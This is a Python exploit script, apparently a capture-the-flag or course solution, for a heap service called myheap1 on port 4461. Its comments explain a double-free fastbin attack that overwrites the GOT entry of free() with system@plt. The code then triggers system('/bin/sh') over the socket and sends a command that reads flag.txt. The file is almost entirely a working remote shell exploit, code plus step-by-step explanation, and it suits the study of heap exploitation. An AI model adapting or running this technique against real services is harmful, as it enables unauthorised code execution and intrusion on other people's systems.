import sys
import struct
import socket

def p(a):
    return struct.pack('Q', a)

# The program does not reset the pointer in values[] after a free. This leads
# to a double-free vulnerability that we can exploit by creating a loop in one
# fastbin list.
# 
# Assume we have created a key 'A' (command 'aA'). The program allocates a chunk and
# stores its pointer into values['A']. We then delete the key two times (command 'dA'),
# generating two calls to free(values['A']).
# 
# 1) After the first free(values['A']), assuming that the corresponding fastbin list is
#    empty, we have the following:
#
#
#  |   fastbin    |                                                        
#  +--------------+      +---------------+                                 
#  |              |----> |               |
#  +--------------+      +---------------+                                 
#  |              |      |               |                                 
#                        +---------------+                                 
#                     fd |    NULL       | <-- values['A']                                 
#                        +---------------+                                 
#                        |               |                                 
#                              ...                                         
#                        |               |
#                        +---------------+
#
# 2) after the second free(values['A']) we obtain:
#
#  |   fastbin    |                                                        
#  +--------------+      +---------------+                                 
#  |              |----> |               | <-+                             
#  +--------------+      +---------------+   |                             
#  |              |      |               |   |                             
#                        +---------------+   |                             
#                     fd |               |---+  <-- values['A']     
#                        +---------------+                                 
#                        |               |                                 
#                              ...                                         
#                        |               |
#                        +---------------+
#
# Now, if we create a new key, we obtain the chunk just fred.  The value
# assigned to the key will overwrite 'fd'. Assume that we overwrite it with an
# address X. If we create another key, X will be copied into the fastbin head
# as part of the list-estraction operations. If we now create yet another key,
# malloc() will return X+16 to the program, and the value assigned to the key
# will overwrite whatever was stored at X+16.
#
# We choose to overwrite the got entry of free() with the address of system@plt
# (the latter exists, because the program already calls system).  This is easy,
# in spite of ASLR, because the program is not PIE and therefore both
# &GOT[free] and system@plt are at known addresses.
#
# Redirecting free() is very convenient, since we control the contents of
# the chunks that we want to free (it's the key value), so we can easily
# forge a system("/bin/sh") call.

host = sys.argv[1] if len(sys.argv) > 1 else 'localhost'
port = 4461

# &GOT[free] obtained with 'readelf -r myheap1 | grep free'
free_got = 0x403510
# address of system@plt obtained with 'objdump -d myheap1 | grep system@plt'
system_plt = 0x401070

# In the following we always send exactly 8 bytes when assign a key value.
# In this way we make sure that the read() in assignkey() does not swallow
# up chars that were intendend for the read()s in child().
s = socket.create_connection((host, port))
# allocate a first key
s.send(b'aA' + b'A'*8)
# delete it two times, creating the loop in the fastbin
s.send(b'dA')
s.send(b'dA')
# create a new key and overwrite 'fd' with the target address minus 16
s.send(b'aB' + p(free_got - 16))
# create a second key to copy 'fd' into the fastbin head.
# We also use this key to hold the command that we want to execute
s.send(b'aC' + b'/bin/sh\0')
# create a third key. The key value will overwrite GOT[free].
s.send(b'aD' + p(system_plt))
# now we delete the 'C' key. This will result in system("/bin/sh").
s.send(b'dC')
# now we are talking to a shell. Let it send us the flag.
s.send(b'/bin/cat flag.txt\n')
sys.stdout.buffer.write(s.recv(500))
